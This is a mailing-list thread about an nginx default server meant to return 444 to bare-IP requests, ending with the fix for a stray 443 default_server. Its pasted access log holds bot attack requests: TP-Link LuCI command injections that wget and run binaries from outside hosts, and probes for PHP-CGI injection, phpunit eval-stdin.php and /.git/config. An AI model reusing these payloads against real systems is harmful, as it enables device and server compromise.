Default site configured for 444 returns 404

Platform: debian 12.6 "bookworm", amd64
          nginx 1.22.1

I have the following in /etc/nginx/sites-available/default:

server {
        listen 80 default_server;
        listen [::]:80 default_server;

        server_name _;

        return 444;
}

This succeeds in some requests using just the IP number returning 444
(which is what I want).

But most of the IP number requests returns 404.

Some IP number requests returns 200 OK.

Does anyone have an idea why?

Here's an extract from the /var/log/nginx/access.log. with requests
using the IPv4 IP number of the server (starts out with a 200, then
comes a couple of 444 (which is what I want), then a couple of 200,
responses, and then some 444 responses, then 200, then 404, then some
444 adresses again until all starts to return 404 (server's IP address
has been replaced by "<server's IPv4 address>"):

94.156.66.116 - - [23/Aug/2024:00:01:50 +0000] "<server's IPv4 address>" "GET / HTTP/1.1" 200 467 "-" "Mozilla/5.0 (Linux; U; Android 1.5; en-us; SPH-M900 Build/CUPCAKE) AppleWebKit/528.5  (ike Gecko) Version/3.1.2 Mobile Safari/525.20.1"                                                                                                                                      
185.224.128.84 - - [23/Aug/2024:00:02:10 +0000] "<server's IPv4 address>" "GET / HTTP/1.1" 444 0 "-" "-"                                                                                       
185.224.128.59 - - [23/Aug/2024:00:36:59 +0000] "<server's IPv4 address>" "GET / HTTP/1.1" 444 0 "-" "-"                                                                                       
162.216.149.127 - - [23/Aug/2024:00:51:03 +0000] "<server's IPv4 address>" "GET / HTTP/1.1" 200 467 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multipleer day to identify customers&#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo at paloaltonetworks.com"     
154.213.185.140 - - [23/Aug/2024:01:09:01 +0000] "<server's IPv4 address>" "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%94.156.66.26%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60) HTTP/1.1" 444 0 "-" "Go-http-client/1.1"                                                                              
185.224.128.83 - - [23/Aug/2024:01:50:28 +0000] "<server's IPv4 address>" "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.18.237t%7Csh%3B%60) HTTP/1.1" 444 0 "-" "Go-http-client/1.1"                                                                                                                                
185.242.226.70 - - [23/Aug/2024:01:55:09 +0000] "<server's IPv4 address>" "GET / HTTP/1.1" 200 467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrom324.190 Safari/537.36"                                                                                                                                                                
172.202.176.134 - - [23/Aug/2024:02:08:27 +0000] "<server's IPv4 address>" "GET /actuator/health HTTP/1.1" 404 125 "-" "Mozilla/5.0 zgrab/0.x"                                                 
199.45.154.128 - - [23/Aug/2024:02:18:44 +0000] "<server's IPv4 address>" "GET / HTTP/1.1" 444 0 "-" "-"                                                                                       
179.43.168.130 - - [23/Aug/2024:02:22:41 +0000] "<server's IPv4 address>" "GET /.git/config HTTP/1.1" 444 0 "-" "Mozilla/4.8 [en] (Windows NT 5.1; U)"                                         
45.148.10.251 - - [23/Aug/2024:02:35:19 +0000] "<server's IPv4 address>" "GET / HTTP/1.1" 444 0 "-" "-"                                                                                        
154.213.185.140 - - [23/Aug/2024:02:41:31 +0000] "<server's IPv4 address>" "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%94.156.66.26%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60) HTTP/1.1" 444 0 "-" "Go-http-client/1.1"                                                                              
75.119.129.239 - - [23/Aug/2024:02:47:51 +0000] "<server's IPv4 address>" "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 153 "-" "Custom-Asyient"
75.119.129.239 - - [23/Aug/2024:02:47:52 +0000] "<server's IPv4 address>" "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
75.119.129.239 - - [23/Aug/2024:02:47:52 +0000] "<server's IPv4 address>" "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
75.119.129.239 - - [23/Aug/2024:02:47:52 +0000] "<server's IPv4 address>" "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
75.119.129.239 - - [23/Aug/2024:02:47:52 +0000] "<server's IPv4 address>" "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
75.119.129.239 - - [23/Aug/2024:02:47:52 +0000] "<server's IPv4 address>" "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
75.119.129.239 - - [23/Aug/2024:02:47:53 +0000] "<server's IPv4 address>" "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
75.119.129.239 - - [23/Aug/2024:02:47:53 +0000] "<server's IPv4 address>" "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
75.119.129.239 - - [23/Aug/2024:02:47:53 +0000] "<server's IPv4 address>" "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
75.119.129.239 - - [23/Aug/2024:02:47:54 +0000] "<server's IPv4 address>" "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"

>>>>> Steinar Bang <sb at dod.no>:

One piece of weirdness in the access.log.

These two IP address requests for "/" returns 200.

> 162.216.149.127 - - [23/Aug/2024:00:51:03 +0000] "<server's IPv4 address>" "GET / HTTP/1.1" 200 467 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multipleer day to identify customers&#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo at paloaltonetworks.com"
...
> 185.242.226.70 - - [23/Aug/2024:01:55:09 +0000] "<server's IPv4 address>" "GET / HTTP/1.1" 200 467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrom324.190 Safari/537.36"

While this one gets the expected 444:

> 199.45.154.128 - - [23/Aug/2024:02:18:44 +0000] "<server's IPv4 address>" "GET / HTTP/1.1" 444 0 "-" "-"

What's the difference between these two I wonder?

Do I have more than one default config? (I think reloading the config
would have failed then?

The one that returns 444 has nothing in the server column, is that significant?

On Sun, Aug 25, 2024 at 6:18 AM Steinar Bang <sb at dod.no> wrote:
>
> >>>>> Steinar Bang <sb at dod.no>:
>
> One piece of weirdness in the access.log.
>
> These two IP address requests for "/" returns 200.
>
> > 162.216.149.127 - - [23/Aug/2024:00:51:03 +0000] "<server's IPv4 address>" "GET / HTTP/1.1" 200 467 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multipleer day to identify customers&#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo at paloaltonetworks.com"
> ...
> > 185.242.226.70 - - [23/Aug/2024:01:55:09 +0000] "<server's IPv4 address>" "GET / HTTP/1.1" 200 467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrom324.190 Safari/537.36"
>
> While this one gets the expected 444:
>
> > 199.45.154.128 - - [23/Aug/2024:02:18:44 +0000] "<server's IPv4 address>" "GET / HTTP/1.1" 444 0 "-" "-"
>
> What's the difference between these two I wonder?
>
> Do I have more than one default config? (I think reloading the config
> would have failed then?
>
> The one that returns 444 has nothing in the server column, is that significant?

The first two which succeed have a user agent string ("Expanse..." and
"Mozilla/5.0..."). The third one which fails lacks the user agent
string ("-").

I'm not sure if that makes the difference in the behavior you are observing.

You may be able to test it with cURL or Wget. Here's how to fiddle
with the user agent with cURL:
<https://everything.curl.dev/http/modify/user-agent.html>; and Wget:
<https://www.gnu.org/software/wget/manual/wget.html#user_agent>.

Jeff

>>>>> Jeffrey Walton <noloader at gmail.com>:

> The first two which succeed have a user agent string ("Expanse..." and
> "Mozilla/5.0..."). The third one which fails lacks the user agent
> string ("-").

> I'm not sure if that makes the difference in the behavior you are observing.

> You may be able to test it with cURL or Wget. Here's how to fiddle
> with the user agent with cURL:
> <https://everything.curl.dev/http/modify/user-agent.html>; and Wget:
> <https://www.gnu.org/software/wget/manual/wget.html#user_agent>.

Hm... everything I try gets 444...?

sb at marquez:~$ curl http://<server's IPv4 address>/
curl: (52) Empty reply from server
sb at marquez:~$ curl https://<server's IPv4 address>/
curl: (60) SSL: no alternative certificate subject name matches target host name '<server's IPv4 address>'
More details here: https://curl.se/docs/sslcerts.html

curl failed to verify the legitimacy of the server and therefore could not
establish a secure connection to it. To learn more about this situation and
how to fix it, please visit the web page mentioned above.
sb at marquez:~$ curl http://<server's IPv4 address>/ --user-agent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrom324.190 Safari/537.36'
curl: (52) Empty reply from server
sb at marquez:~$

(As expected only HTTP on port 80 will work at all for the IP address,
since there is no certificate matchinng the IP number as hostname)

Found something!

If I use https with the IP number and ignore the certificate errors
caused by there being no certificate that matches the IP number, then I
get a 200 OK (or presumably 404 as I've seen for some addresses).

sb at marquez:~$ curl -svk https://<server's IPv4 address>/
*   Trying <server's IPv4 address>:443...
* Connected to <server's IPv4 address> (<server's IPv4 address>) port 443 (#0)
* ALPN: offers h2,http/1.1
* TLSv1.3 (OUT), TLS handshake, Client hello (1):
* TLSv1.3 (IN), TLS handshake, Server hello (2):
* TLSv1.3 (IN), TLS handshake, Encrypted Extensions (8):
* TLSv1.3 (IN), TLS handshake, Certificate (11):
* TLSv1.3 (IN), TLS handshake, CERT verify (15):
* TLSv1.3 (IN), TLS handshake, Finished (20):
* TLSv1.3 (OUT), TLS change cipher, Change cipher spec (1):
* TLSv1.3 (OUT), TLS handshake, Finished (20):
* SSL connection using TLSv1.3 / TLS_AES_256_GCM_SHA384
* ALPN: server accepted http/1.1
* Server certificate:
*  subject: CN=www.bang.priv.no
*  start date: Jul  3 23:25:10 2024 GMT
*  expire date: Oct  1 23:25:09 2024 GMT
*  issuer: C=US; O=Let's Encrypt; CN=R11
*  SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.
* using HTTP/1.1
> GET / HTTP/1.1
> Host: <server's IPv4 address>
> User-Agent: curl/7.88.1
> Accept: */*
> 
* TLSv1.3 (IN), TLS handshake, Newsession Ticket (4):
* TLSv1.3 (IN), TLS handshake, Newsession Ticket (4):
* old SSL session ID is stale, removing
< HTTP/1.1 200 OK
< Server: nginx/1.22.1
< Date: Sun, 25 Aug 2024 20:28:48 GMT
< Content-Type: text/html
< Content-Length: 864
< Last-Modified: Thu, 27 Aug 2020 16:54:00 GMT
< Connection: keep-alive
< ETag: "5f47e528-360"
< Accept-Ranges: bytes
< 
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">

<html>
  <head>
    <title>Familien Bangs eget web-domene</title>
  </head>
  <body>
    <h1>Familien Bangs eget web-domene</h1>

    <p>Jada.  Hehe!  Men hvis resten av familien vil ha noen linker
      herfra, s� m� de nok komme krypende til meg og sp�rre pent.
      Forel�pig er jeg den eneste her.</p>

    <ul>
      <li><a href="https://steinar.bang.priv.no">Steinar Bangs blogg</a></li>
      <li><a href="sb/"><em>Historiske sider for Steinar Bang (sider fra 1994-1999)</em></a></li>
      <li><a href="sb/pics/"><em>Bildearkiv fra 1990-tallet</em></a></li>
      <li><a href="https://oldalbum.bang.priv.no"><em>Ny versjon av bildearkiv fra 1990-tallet</em></a></li>
    </ul>

    <hr>
    <address>
      <a href="mailto:webmaster at bang.priv.no">webmaster at bang.priv.no</a>
    </address>
  </body>
</html>
* Connection #0 to host <server's IPv4 address> left intact
sb at marquez:~$

Ok, found it!

Turned out one of my other configs (the server www.mycompany.com one)
had this
server {
        # SSL configuration
        #
        listen 443 ssl default_server;
        listen [::]:443 ssl default_server;
        ssl_certificate     /etc/letsencrypt/live/www.mycompany.com/fullchain.pem;
        ssl_certificate_key /etc/letsencrypt/live/www.mycompany.com/privkey.pem;

        server_name www.mycompany.com;
}

so what I did, was:

 1. Remove the " default_server" from the www.mycompany.com server:
     server {
             # SSL configuration
             #
             listen 443 ssl default_server;
             listen [::]:443 ssl default_server;
             ssl_certificate     /etc/letsencrypt/live/www.mycompany.com/fullchain.pem;
             ssl_certificate_key /etc/letsencrypt/live/www.mycompany.com/privkey.pem;

             server_name www.mycompany.com;
     }

 2. Add SSL listening for default_server to the default config:
     server {
             listen 80 default_server;
             listen [::]:80 default_server;
             listen 443 ssl default_server;
             listen [::]:443 ssl default_server;
             ssl_certificate     /etc/letsencrypt/live/www.bang.priv.no/fullchain.pem;
             ssl_certificate_key /etc/letsencrypt/live/www.bang.priv.no/privkey.pem;

             server_name _;

             return 444;
     }

After this, all IP number accesses to my server on either port 80 or
port 443, are met with 444.

Improved 444 configuration: replaced the letsencrypt certificate (which
won't work here anyway) with the self signed certificates bundled with
nginx (the more broken, the merrier in this case... confuse the bots!):

server {
        listen 80 default_server;
        listen [::]:80 default_server;
        listen 443 ssl default_server;
        listen [::]:443 ssl default_server;
        include snippets/snakeoil.conf;

        server_name _;

        return 444;
}